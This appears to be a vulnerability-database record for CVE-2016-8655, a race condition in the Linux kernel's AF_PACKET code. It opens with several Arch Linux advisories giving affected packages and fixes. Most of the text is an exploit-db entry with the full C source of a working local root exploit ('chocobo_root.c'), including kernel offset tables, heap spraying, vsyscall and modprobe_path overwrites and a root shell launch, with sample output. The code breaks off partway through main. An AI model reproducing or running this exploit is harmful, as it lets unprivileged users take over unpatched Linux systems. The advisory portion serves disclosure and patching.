implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nImpact\n======\n\nA local attacker with CAP_NET_RAW capabilities is able to crash the\nsystem or run arbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "id": "ASA-201612-8", "href": "https://security.archlinux.org/ASA-201612-8", "type": "archlinux", "title": "[ASA-201612-8] linux-zen: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-6\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux before version 4.8.12-2 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 4.8.12-2.\n\n# pacman -Syu \"linux>=4.8.12-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. 
A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-6", "href": "https://security.archlinux.org/ASA-201612-6", "type": "archlinux", "title": "[ASA-201612-6] linux: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-5\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux-grsec\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-grsec before version 1:4.8.12.r201612031658-2 is\nvulnerable to privilege escalation.\n\nResolution\n==========\n\nUpgrade to 1:4.8.12.r201612031658-2.\n\n# pacman -Syu \"linux-grsec>=1:4.8.12.r201612031658-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. 
A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-5", "href": "https://security.archlinux.org/ASA-201612-5", "type": "archlinux", "title": "[ASA-201612-5] linux-grsec: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-7\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux-lts\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-lts before version 4.4.36-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.4.36-1.\n\n# pacman -Syu \"linux-lts>=4.4.36-1\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. 
A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-7", "href": "https://security.archlinux.org/ASA-201612-7", "type": "archlinux", "title": "[ASA-201612-7] linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-11-30T12:32:58", "description": "", "published": "2016-12-06T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-06T00:00:00", "id": "EDB-ID:40871", "href": "https://www.exploit-db.com/exploits/40871", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking 
vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n\r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n\r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\n\r\nstruct offset *off = NULL;\r\n\r\n//99% of these offsets haven't actually been tested :)\r\n\r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic 
#68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n 
{\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic 
#37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic 
#62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n\r\n#define PAD 64\r\n\r\nint pad_fds[PAD];\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while(barrier) {}\r\n\r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n y++;\r\n\r\n if(x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if(x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n\r\n return NULL;\r\n}\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n\r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n 
fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n}\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n\r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n fprintf(stderr,\"sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n\r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n 
while(!vers_switcher_done)usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n\r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n\r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n\r\n\r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n\r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n fprintf(stderr,\"all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid 
verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n for(x=0; x<300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n printf(\"could not modify vsyscall\\n\");\r\n\r\n exit(1);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n\r\n sleep(5);\r\n\r\n for(x=0; x<300; x++) {\r\n\r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n\r\n\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n printf(\"\\n\");\r\n\r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n\r\n\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n\r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n\r\n printf(\"\\nstage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n printf(\"registering new sysctl..\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void 
*)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n\r\n printf(\"stage 2 completed\\n\");\r\n}\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n\r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n\r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n\r\n memset(buf,'\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n\r\n write(fd,buf,strlen(buf)+1);\r\n\r\n socket(AF_INET,SOCK_STREAM,132);\r\n\r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n\r\n else\r\n printf(\"could not create rootshell\\n\");\r\n\r\n\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n\r\n\r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n\r\n\r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n\r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n\r\n 